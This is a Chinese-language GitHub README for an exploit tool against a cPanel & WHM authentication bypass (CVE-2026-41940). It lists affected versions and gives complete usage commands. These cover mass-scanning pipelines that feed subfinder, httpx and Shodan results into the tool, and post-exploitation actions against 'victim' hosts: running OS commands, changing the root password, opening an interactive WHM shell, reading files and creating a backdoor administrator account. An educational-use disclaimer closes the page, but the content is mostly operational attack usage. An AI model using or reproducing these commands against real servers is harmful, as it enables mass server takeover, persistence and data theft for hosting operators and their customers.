aquace/CVE-2026-41940-PoC
GitHub: aquace/CVE-2026-41940-PoC
针对 cPanel & WHM 身份验证绕过漏洞 CVE-2026-41940 的 PoC 利用工具,支持批量扫描检测及后渗透操作。
Stars: 115 | Forks: 13
# CVE-2026-41940
## 描述
一个用于利用 CVE-2026-41940 的工具,这是 cPanel & WHM 中一个严重的身份验证绕过漏洞(CVSS 10.0),允许未经身份验证的攻击者通过 Authorization 标头将 CRLF 序列注入服务器端 session 文件中,从而获得 root 级别的 WHM 访问权限 —— 无需任何凭证。
## 工作原理
CVE-2026-41940,总的来说,是通过破坏系统处理 cPanel/WHM 中身份验证 session 的方式来利用的。攻击通常从向登录界面发送一个正常请求开始,在此过程中,应用程序在完全验证用户凭证之前就过早地初始化了 session。由于对 session 相关输入的不当处理,某些精心构造或意外的输入结构可以改变服务器存储或解释 session 数据的方式。
## 受影响版本
| 版本 | 易受攻击 | 已修复 |
|--------|-----------|---------|
| 110.x | ≤ 11.110.0.96 | **11.110.0.97** |
| 118.x | ≤ 11.118.0.62 | **11.118.0.63** |
| 126.x | ≤ 11.126.0.53 | **11.126.0.54** |
| 132.x | ≤ 11.132.0.28 | **11.132.0.29** |
| 134.x | ≤ 11.134.0.19 | **11.134.0.20** |
| 136.x | ≤ 11.136.0.4 | **11.136.0.5** |
## 安装 (Windows/Mac OS)🔄
```
git clone https://github.com/aquace/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python exp.py
# MacOS/Linux
python3 exp.py
```
# 如何使用
该工具需要指定一个目标域名。
单目标模式:
```
python exp.py -u https://target1.com:2083
```
你也可以从 `target.txt` 文件中进行扫描(需先创建该文件):
```
python exp.py -l target.txt -t 50 -o result.json
```
## 基础扫描:
可用命令:
```
python exp.py -u https://victim1.com:2083 # single target scan
python exp.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python exp.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.
```
# 后渗透操作
```
# 列出服务器上的所有账户
python exp.py list -u https://target.com:2087
# OS 命令
python exp.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python exp.py cmd -u https://target.com:2087 --cmd "ls /home"
# 获取服务器信息 (hostname, disk, MySQL host)
python exp.py info -u https://target.com:2087
# 更改 root 密码
python exp.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# 交互式 WHM shell
python exp.py shell -u https://target.com:2087
```
# Pipelines
```
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python exp.py scan -t 40 -o results.json
# 从 scope 列表
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python exp.py scan -t 30 -o results.json
# Shodan 结果
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python exp.py -t 30 -o shodan_results.json
# 合并多个来源
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python exp.py -t 20 --action list
```
# WHM Shell 模式
成功执行后,你可以打开一个交互式的 WHM shell:
```
python exp.py shell -u
```
### 所有 Shell 命令
| 命令 | 描述 |
|---------|-------------|
| `id` | 显示用户 ID |
| `hostname` | 获取服务器主机名 |
| `accounts` | 列出所有用户账户 |
| `info` | 负载、磁盘、MySQL 主机、版本 |
| `cat ` | 读取文件内容 |
| `exec ` | 执行 OS 命令 |
| `newadmin ` | 创建后门 WHM 管理员 |
| `passwd ` | 更改 root 密码 |
| `l [path]` | 列出目录 |
| `help` | 显示所有命令 |
| `exit` | 退出 shell 模式 |
# CLI 参考
```
usage: exp.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
```
# 免责声明
**⚠ 此工具仅出于教育或漏洞赏金目的而创建。严禁在受控环境之外未经授权使用。**
标签:cPanel, CVE-2026-41940, PoC, StruQ, 暴力破解, 身份验证绕过, 逆向工具